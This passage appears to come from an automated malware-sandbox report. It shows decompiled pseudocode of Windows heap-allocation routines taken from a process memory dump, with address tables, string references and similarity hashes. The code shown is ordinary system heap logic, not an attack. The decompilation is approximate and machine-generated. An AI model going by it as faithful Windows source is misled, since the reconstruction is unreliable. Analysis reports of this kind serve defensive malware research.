											E0169A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E015FA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E015F7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E015F7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01691411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E015F7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E015F7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x16c8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E015DB150();
							} else {
								E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E015DB150();
							__eflags =  *0x16c7bc8;
							if( *0x16c7bc8 == 0) {
								__eflags = 0;
								E01692073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x16c8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E015DB150();
												} else {
													E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E015DB150();
												__eflags =  *0x16c7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01692073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0169A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E015FA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E015FB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E015FA830(_t553, _v64, _v24);
								_t286 = E015F7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E015F7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01691411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E015F7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E015F7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01691411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0160174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E015FB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E015F7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E016914FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E015F99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E015FA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0160ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x015fa309
0x015fa316
0x015fa319
0x015fa31d
0x015fa32d
0x015fa331
0x01641e0d
0x01641e10
0x015fa3cb
0x015fa3cb
0x015fa3bd
0x015fa3c3
0x015fa3c3
0x015fa33a
0x01641e17
0x01641e1b
0x01641e1d
0x01641e2f
0x01641e34
0x01641e36
0x01641e3c
0x01641e3c
0x01641e3c
0x01641e3c
0x01641e36
0x01641e42
0x01641e45
0x01641e47
0x015fa3f8
0x015fa3f8
0x015fa3fb
0x015fa3fd
0x01641e50
0x015fa403
0x015fa411
0x015fa411
0x015fa411
0x015fa41e
0x015fa420
0x015fa424
0x015fa427
0x015fa7c9
0x015fa7cd
0x015fa7d2
0x015fa7d9
0x015fa7e0
0x015fa7e3
0x015fa7ed
0x015fa7f3
0x015fa7f9
0x015fa7ff
0x015fa802
0x015fa807
0x015fa809
0x015fa809
0x015fa809
0x015fa80f
0x015fa80f
0x015fa812
0x015fa81c
0x015fa821
0x015fa824
0x015fa42d
0x015fa42d
0x015fa42d
0x015fa42d
0x015fa42d
0x015fa436
0x015fa43a
0x015fa609
0x015fa60d
0x015fa612
0x015fa616
0x015fa61a
0x01641e57
0x01641e59
0x00000000
0x00000000
0x01641e5f
0x015fa620
0x015fa627
0x01641e64
0x01641e66
0x01641e6c
0x01641e72
0x01641e76
0x01641e95
0x01641e9a
0x01641e78
0x01641e8d
0x01641e92
0x01641ea0
0x01641ea5
0x01641eaa
0x01641eb2
0x01641eb6
0x01641eb9
0x01641eb9
0x01641ebe
0x01641ec2
0x01641ec2
0x01641e66
0x015fa62d
0x015fa633
0x015fa636
0x015fa63a
0x015fa63c
0x015fa640
0x015fa642
0x015fa644
0x015fa644
0x015fa644
0x015fa64d
0x015fa64d
0x015fa651
0x015fa655
0x01641eca
0x01641ed1
0x00000000
0x00000000
0x01641ed7
0x00000000
0x015fa65b
0x015fa669
0x015fa66e
0x015fa670
0x00000000
0x00000000
0x015fa676
0x015fa67b
0x015fa680
0x015fa682
0x01641f1a
0x015fa688
0x015fa688
0x015fa688
0x015fa68a
0x015fa68d
0x01641f24
0x01641f2a
0x01641f31
0x01641f43
0x01641f43
0x01641f31
0x015fa693
0x015fa697
0x015fa69d
0x015fa6a0
0x015fa6a6
0x015fa6a8
0x015fa6a8
0x015fa6a8
0x015fa6a8
0x015fa6b2
0x015fa6b7
0x015fa6c1
0x015fa6c6
0x015fa6d2
0x015fa6d9
0x015fa6e3
0x015fa6e6
0x015fa6eb
0x015fa6ed
0x015fa6ed
0x015fa6ed
0x015fa6ed
0x015fa6f3
0x015fa6f8
0x015fa702
0x015fa70a
0x015fa70e
0x015fa71a
0x015fa71e
0x01641fcb
0x01641fcf
0x01641fdd
0x01641fe3
0x01641fe3
0x015fa724
0x015fa728
0x015fa72a
0x015fa72d
0x015fa737
0x015fa73a
0x015fa73c
0x015fa742
0x015fa748
0x01641f4d
0x01641f50
0x01641f56
0x01641f5c
0x01641f5f
0x01641f7e
0x01641f83
0x01641f61
0x01641f76
0x01641f7b
0x01641f89
0x01641f8e
0x01641f93
0x01641f94
0x01641f9a
0x01641f9c
0x01641f9e
0x01641fa1
0x01641fa1
0x01641fa6
0x01641fa6
0x01641f50
0x015fa74e
0x015fa751
0x015fa754
0x015fa75d
0x015fa75e
0x015fa762
0x015fa767
0x01641faf
0x01641fb0
0x01641fb9
0x01641fbe
0x01641fc2
0x01641fc2
0x015fa76d
0x015fa76d
0x015fa775
0x015fa778
0x015fa77d
0x015fa77d
0x015fa71e
0x015fa782
0x015fa787
0x015fa789
0x01641ff3
0x015fa78f
0x015fa78f
0x015fa78f
0x015fa791
0x015fa794
0x01641ffd
0x01642006
0x0164200c
0x01642017
0x01642019
0x01642024
0x01642024
0x01642024
0x01642047
0x01642047
0x0164200c
0x015fa79a
0x015fa79f
0x015fa7a4
0x015fa7a9
0x015fa7ab
0x0164205a
0x015fa7b1
0x015fa7b1
0x015fa7b1
0x015fa7b3
0x015fa7b6
0x00000000
0x015fa7bc
0x01642066
0x01642068
0x01642073
0x01642073
0x01642073
0x01642078
0x01642079
0x0164207d
0x00000000
0x0164207d
0x015fa7b6
0x015fa440
0x015fa440
0x015fa440
0x015fa446
0x015fa44c
0x015fa44f
0x015fa453
0x015fa455
0x016420b3
0x016420b9
0x016420b9
0x015fa45d
0x015fa460
0x015fa464
0x015fa466
0x015fa46b
0x015fa46f
0x015fa471
0x015fa471
0x015fa471
0x015fa474
0x015fa479
0x015fa47d
0x015fa47f
0x01642229
0x0164222f
0x015fa3c8
0x015fa3c8
0x015fa3ca
0x015fa3ca
0x00000000
0x015fa3ca
0x01642235
0x0164223a
0x0164223a
0x00000000
0x00000000
0x01642240
0x01642246
0x0164224a
0x01642269
0x0164226e
0x0164224c
0x01642261
0x01642266
0x01642274
0x01642279
0x0164227e
0x01642286
0x01642288
0x0164228d
0x0164228d
0x01642292
0x01642292
0x01642295
0x01642295
0x00000000
0x01642295
0x015fa485
0x015fa489
0x015fa48b
0x015fa48f
0x015fa493
0x015fa497
0x015fa49b
0x015fa4bb
0x015fa4bb
0x015fa4bd
0x015fa4ff
0x015fa4ff
0x015fa501
0x015fa505
0x015fa50f
0x015fa517
0x015fa51b
0x015fa527
0x015fa52b
0x01642182
0x01642185
0x01642193
0x01642199
0x01642199
0x015fa531
0x015fa535
0x015fa538
0x015fa548
0x015fa54b
0x015fa54d
0x015fa553
0x015fa559
0x01642100
0x01642103
0x01642109
0x0164210f
0x01642112
0x01642131
0x01642136
0x01642114
0x01642129
0x0164212e
0x0164213c
0x01642141
0x01642147
0x0164214d
0x01642151
0x01642154
0x01642154
0x01642159
0x01642159
0x01642103
0x015fa55f
0x015fa562
0x015fa565
0x015fa567
0x01642162
0x015fa56d
0x015fa574
0x015fa575
0x015fa579
0x015fa57e
0x01642169
0x0164216a
0x01642170
0x01642175
0x01642179
0x01642179
0x015fa57e
0x015fa584
0x015fa58f
0x015fa58f
0x015fa52b
0x015fa5ad
0x015fa5bc
0x015fa5c1
0x015fa5c6
0x015fa5cb
0x015fa5cd
0x016421a9
0x015fa5d3
0x015fa5d3
0x015fa5d3
0x015fa5d5
0x015fa5d8
0x016421b3
0x016421bc
0x016421c2
0x016421cd
0x016421cf
0x016421da
0x016421da
0x016421da
0x016421f7
0x016421f7
0x016421c2
0x015fa5de
0x015fa5e3
0x015fa5e8
0x015fa5ea
0x0164220a
0x015fa5f0
0x015fa5f0
0x015fa5f0
0x015fa5f2
0x015fa5f5
0x01642219
0x0164221b
0x0164208c
0x0164208c
0x0164208c
0x01642095
0x01642096
0x01642097
0x01642098
0x016420a4
0x016420a5
0x016420a9
0x016420a9
0x00000000
0x015fa5f5
0x015fa4bf
0x015fa4d3
0x015fa4d8
0x015fa4da
0x01641ede
0x01641ede
0x01641ee4
0x01641ee9
0x00000000
0x00000000
0x01641f07
0x00000000
0x01641f07
0x015fa4e0
0x015fa4e5
0x015fa4e7
0x016420cb
0x015fa4ed
0x015fa4ed
0x015fa4ed
0x015fa4f2
0x015fa4f5
0x016420d5
0x016420de
0x016420e4
0x016420f6
0x016420f6
0x016420e4
0x015fa4fb
0x00000000
0x015fa4fb
0x015fa4a1
0x015fa4a4
0x015fa4a8
0x00000000
0x00000000
0x015fa4aa
0x015fa4ac
0x00000000
0x00000000
0x015fa4b2
0x015fa4b5
0x00000000
0x00000000
0x00000000
0x015fa4b5
0x015fa43a
0x015fa340
0x015fa346
0x015fa600
0x00000000
0x015fa600
0x015fa34f
0x015fa351
0x015fa358
0x015fa3c6
0x00000000
0x015fa371
0x015fa37a
0x015fa37f
0x015fa382
0x015fa384
0x015fa394
0x00000000
0x015fa396
0x015fa399
0x015fa3a7
0x015fa3b0
0x015fa3b4
0x015fa3bb
0x015fa3d2
0x015fa3da
0x015fa3df
0x015fa3e1
0x015fa3e5
0x015fa3ea
0x015fa3f0
0x015fa3f0
0x015fa3e1
0x00000000
0x015fa3bb
0x015fa394

Strings

(UCRBlock != NULL), xrefs: 01641EA0
HEAP[%wZ]: , xrefs: 01641E88, 01641F71, 01642124, 0164225C
(LONG)FreeEntry->Size > 1, xrefs: 0164213C
(!TrailingUCR), xrefs: 01642274
HEAP: , xrefs: 01641E95, 01641F7E, 01642131, 01642269
((LONG)FreeEntry->Size > 1), xrefs: 01641F89

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: e33352623e45294cc53b117f83f2e1916fb2c210abb956d7206f9714bd0e0699
Instruction ID: 92cb7d428c99476d2f0e50f2b574d63d308045c742ca55267dd7555d28b9fa5a
Opcode Fuzzy Hash: e33352623e45294cc53b117f83f2e1916fb2c210abb956d7206f9714bd0e0699
Instruction Fuzzy Hash: AB42E1316087429FD725DF28C894B2ABBE6FF88604F14496DF68ACB351D734E981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01692D82, Relevance: 7.7, Strings: 6, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E01692D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x16b0e80);
				E0162D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E015D40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E016930C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E015DB150();
						} else {
							E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E015DB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E015EEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01694496(_t181, 0);
						_t177 = L015F4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E016949A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0168FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E015D1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E016016C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01694496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x16c6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x16c6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x16c6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0167D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E015DB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E015DB150("Just allocated block at %p for %Ix bytes\n",  *0x16c6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x16c6378 = 1;
									 *0x16c60c0 = 0;
									asm("int3");
									 *0x16c6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x16c5708; // 0x0
					 *0x16cb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0162D130(0, _t177, _t181);
				}
			}

0x01692d82
0x01692d84
0x01692d89
0x01692d8e
0x01692d90
0x01692d92
0x01692d97
0x01692d9a
0x01692da4
0x01692dc0
0x01692dc3
0x01692dd1
0x01692dd6
0x01692dd8
0x016930a7
0x016930a7
0x016930aa
0x016930aa
0x016930ad
0x016930b4
0x00000000
0x016930b9
0x01692de3
0x01692de8
0x01692deb
0x01692dee
0x01692df1
0x01692df3
0x01692dfb
0x01692dfb
0x01692df5
0x01692df5
0x01692df5
0x01692e04
0x01692e0a
0x01692e0d
0x01692e11
0x01692e11
0x01692e12
0x01692e15
0x01692e18
0x01692e1a
0x01693027
0x01693027
0x0169302d
0x01693030
0x0169304f
0x01693054
0x01693032
0x01693047
0x0169304c
0x0169305a
0x01693063
0x00000000
0x01692e20
0x01692e20
0x01692e23
0x00000000
0x00000000
0x01692e29
0x01692e2b
0x01692e47
0x01692e2d
0x01692e33
0x01692e38
0x01692e3f
0x01692e42
0x01692e42
0x01692e4e
0x01692e5d
0x01692e5f
0x01692e62
0x01692e66
0x01692e6b
0x01692e6d
0x00000000
0x01692e73
0x01692e73
0x01692e76
0x01692e7a
0x01692e83
0x01692e83
0x01692e83
0x01692e85
0x01692e87
0x01692e8a
0x01692e8d
0x01692e92
0x01692e9c
0x01692e9f
0x01692ea1
0x01692ea2
0x01692ea6
0x01692ea6
0x01692e9f
0x01692eab
0x01692eaf
0x01692edf
0x01692ee2
0x01692ee5
0x01692eb1
0x01692eb3
0x01692eb8
0x01692ebd
0x01692ec4
0x01692ed6
0x01692ec6
0x01692ec7
0x01692ecc
0x01692ecf
0x01692ed2
0x01692ed2
0x01692ed9
0x01692ed9
0x01692ee8
0x01692eeb
0x01692eef
0x01692ef2
0x01692efe
0x01692f04
0x01692f04
0x01692f04
0x01692f06
0x01692f0d
0x01692f0f
0x01692f13
0x01692f13
0x01692f1b
0x01692f21
0x01692f27
0x01692f95
0x01692f98
0x01692f9b
0x01692fa0
0x00000000
0x00000000
0x01692fa6
0x01692fa9
0x01692fac
0x00000000
0x00000000
0x01692fb2
0x01692fb9
0x00000000
0x00000000
0x01692fc3
0x01692fca
0x00000000
0x00000000
0x01692fd0
0x01692fd6
0x01692fd9
0x01692ff8
0x01692ffd
0x01692fdb
0x01692ff0
0x01692ff5
0x0169300e
0x0169300f
0x0169301a
0x00000000
0x01692f29
0x01692f29
0x01692f2c
0x01692f4b
0x01692f50
0x01692f2e
0x01692f43
0x01692f48
0x01692f56
0x01692f64
0x01692f6c
0x01692f6c
0x01692f72
0x01692f76
0x01692f7c
0x01692f83
0x01692f89
0x01692f8a
0x01692f8a
0x00000000
0x01692f76
0x01692f27
0x01692e6d
0x01692da6
0x01692dab
0x01692db3
0x01692db9
0x016930bc
0x016930c1
0x016930c1

Strings

HEAP[%wZ]: , xrefs: 01692F3E, 01692FEB, 01693042
Just allocated block at %p for %Ix bytes, xrefs: 01692F5F
HEAP: , xrefs: 01692F4B, 01692FF8, 0169304F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0169305E
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 01693015
RtlAllocateHeap, xrefs: 01692DCA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 37584437783e358b50f833ac59747ffd60e027e2a7c580cf750d601f5e967c7c
Instruction ID: d16439240fbac606972ff7b5f1e15e30d58e3bd05a87aca02bfb7b7fd9729fd4
Opcode Fuzzy Hash: 37584437783e358b50f833ac59747ffd60e027e2a7c580cf750d601f5e967c7c
Instruction Fuzzy Hash: B191E031600642EFDF22DFA8CC94AADBBF6FF89610F18805DE54A9B351C7329942CB15

Uniqueness

